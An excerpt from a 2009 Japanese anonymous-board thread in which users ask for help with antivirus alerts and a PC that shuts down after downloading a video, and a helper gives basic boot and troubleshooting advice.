【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybotとブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「場所:C:\ProgramData\Skype\Plugins\_sstore.dat
ウィルス名:SVL 1.X (Slovakia)


スカイプはいつもオンにしていて特に変わった作業をしたわけではありませんが、
いきなりavast!の警告が出ました。
avast!のスキャンを実行していたわけでもありません。
このウィルス警告が出たので、avastの警告画面の削除ボタンを押しました。
このウィルスは何ですか?なに経由できたんでしょうか?」
969名無しさん@お腹いっぱい。2009/05/30(土) 20:04:10
maruti
970名無しさん@お腹いっぱい。sage2009/06/01(月) 00:18:38
昨日、中国の動画サイトで映画ナルト疾風伝・絆があったのでダウンロードしたのですが
ダウンロード終わったとほぼ同時に、いきなり強制終了したかのように確認ウィンドウもなしに電源が切れ、
すぐに電源ボタン押しても全く反応せず、
数分後に再び電源ボタン押すと数秒だけ起動しただけで、またシャットダウンしました
今も起動出来ません

この症状を質問スレで書いて聞いてみたら
「おそらく出力が安定していない。電源ユニットが逝ったと思われる。交換しよう」と、回答が返ってきたのですが
ウィルスでこのような症状に陥ることはないのでしょうか?
971 ◆N9P3SuvBPo sage2009/06/01(月) 00:50:25
これも自業自得ですね。

1.電源入れてからどの辺りまで正常に起動できるか
2.セーフモードでの起動も試してみたか
972名無しさん@お腹いっぱい。sage2009/06/01(月) 01:03:26
>>971
レスありがとうございます
PCの起動ボタンを押すと反応するときとしないときがあります。
反応したときはDELLのロゴが出てくるところまで行くこともありますが、行かないこともあります。
ロゴまで行ってもそれ以上進むことはなく、ロゴが表示してる間にF8ボタンを押すと一度だけ進み、
通常起動する(うろ覚え)を選び、何もなかったかのように起動してデスクトップまで行きましたが
ウィルスバスター2009でフルスキャンをかけている途中で突然強制終了しました。

まだセーフモードで起動は試みてませんが、次いけそうであればやってみます。

それと次起動できたときはスキャンよりシステムの復元を試したほうがよいでしょうか?
973 ◆N9P3SuvBPo sage2009/06/01(月) 01:11:49
>972
PCに繋がっている周辺機器(マウス・キーボード以外)を外しても同じことになりますか?

システムの復元はイチかバチかの賭け
上手く行けば良いけど…
974名無しさん@お腹いっぱい。sage2009/06/01(月) 01:26:35
>>973
もう夜も遅いので、また明日やってみることにします
975名無しさん@お腹いっぱい。sage2009/06/01(月) 03:08:36
ネットで調べてみましたが
どうやらBlasterというウィルスみたいですね
976 ◆N9P3SuvBPo sage2009/06/01(月) 20:46:18
Blasterワームとは違いますね…
もしBlasterなら再起動という症状ですし。
 348KB (357088Byte)
dummy_for_searchRef

DAT2HTML 0.32g Converted.